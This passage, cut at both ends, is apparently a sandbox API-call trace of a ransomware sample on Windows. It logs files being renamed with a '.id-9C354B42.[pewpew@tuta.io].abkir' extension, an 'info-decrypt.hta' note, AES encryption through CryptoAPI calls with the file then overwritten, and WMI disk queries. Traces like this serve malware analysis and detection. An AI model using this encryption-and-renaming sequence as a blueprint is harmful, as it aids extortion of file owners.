ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x35300980, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0207.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0207.618] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0207.619] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0207.619] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0207.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0207.619] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32bb9e80, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32bb9e80, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32bb9e80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0207.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0207.619] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0207.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0207.620] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x3712968 | out: lpFileInformation=0x3712968*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f)) returned 1 [0207.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0207.620] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0207.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0207.620] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0207.620] GetFileType (hFile=0x31c) returned 0x1 [0207.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0207.620] GetFileType (hFile=0x31c) returned 0x1 [0207.620] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x106f [0207.620] ReadFile (in: hFile=0x31c, lpBuffer=0x3712b78, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x3712b78*, lpNumberOfBytesRead=0x6c0f4ec*=0x106f, lpOverlapped=0x0) returned 1 [0207.622] CloseHandle (hObject=0x31c) returned 1 [0207.622] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdfae0) returned 1 [0207.623] CryptGenRandom (in: hProv=0xbdfae0, dwLen=0x10, pbBuffer=0x37142ac | out: pbBuffer=0x37142ac) returned 1 [0207.897] CryptImportKey (in: hProv=0xbdfae0, pbData=0x3666838, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f1d0) returned 1 [0207.897] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.897] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.897] CryptDuplicateKey (in: hKey=0xb7f1d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f650) returned 1 [0207.897] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.897] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x3666918*=0x1, dwFlags=0x0) returned 1 [0207.897] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x36668e4, dwFlags=0x0) returned 1 [0207.897] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3666928*, pdwDataLen=0x6c0f4b8*=0x1070, dwBufLen=0x1070 | out: pbData=0x3666928*, pdwDataLen=0x6c0f4b8*=0x1070) returned 1 [0207.897] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36679bc*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x36679bc*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0207.899] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0207.899] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0207.899] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0207.899] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0207.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0207.899] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0207.899] GetFileType (hFile=0x208) returned 0x1 [0207.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0207.900] GetFileType (hFile=0x208) returned 0x1 [0207.900] WriteFile (in: hFile=0x208, lpBuffer=0x3667fe0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3667fe0*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0207.901] CloseHandle (hObject=0x208) returned 1 [0207.901] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0207.901] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0207.901] CoTaskMemFree (pv=0xbed438) [0207.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0207.901] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0207.901] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0207.902] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0207.902] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.902] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027230) returned 0x0 [0207.903] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0207.903] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027230, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x60309b0) returned 0x0 [0207.903] WbemDefPath:IUnknown:Release (This=0x6027230) returned 0x0 [0207.903] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x60309b0) returned 0x0 [0207.903] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0207.904] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0207.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0207.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0207.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbe2290) returned 0x0 [0207.904] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2290, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.904] WbemDefPath:IUnknown:Release (This=0xbe2290) returned 0x3 [0207.904] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0207.904] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0207.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0207.904] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0207.904] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0207.904] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0207.904] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0207.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x60309b0) returned 0x0 [0207.904] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0207.905] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0207.905] WbemDefPath:IWbemPath:SetText (This=0x60309b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetInfo (in: This=0x60309b0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetInfo (in: This=0x60309b0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetInfo (in: This=0x60309b0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0207.905] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.905] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0207.905] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0207.905] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0207.905] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.906] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60272f0) returned 0x0 [0207.906] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0207.906] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60312e0) returned 0x0 [0207.906] WbemDefPath:IUnknown:Release (This=0x60272f0) returned 0x0 [0207.906] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60312e0) returned 0x0 [0207.906] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0207.906] WbemDefPath:IUnknown:AddRef (This=0x60312e0) returned 0x3 [0207.906] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0207.906] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0207.906] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbe2480) returned 0x0 [0207.907] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2480, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.907] WbemDefPath:IUnknown:Release (This=0xbe2480) returned 0x3 [0207.907] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0207.907] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0207.907] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0207.907] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x2 [0207.907] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x1 [0207.907] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0207.907] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0207.907] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60312e0) returned 0x0 [0207.907] WbemDefPath:IUnknown:AddRef (This=0x60312e0) returned 0x3 [0207.907] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x2 [0207.907] WbemDefPath:IWbemPath:SetText (This=0x60312e0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0207.907] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0207.907] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0207.907] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.907] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0207.907] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0207.907] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0207.907] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.908] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6024e10) returned 0x0 [0207.908] WbemLocator:IUnknown:QueryInterface (in: This=0x6024e10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0207.908] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024e10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027210) returned 0x0 [0207.908] WbemLocator:IUnknown:Release (This=0x6024e10) returned 0x0 [0207.908] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027210) returned 0x0 [0207.908] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0207.908] WbemLocator:IUnknown:AddRef (This=0x6027210) returned 0x3 [0207.908] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, 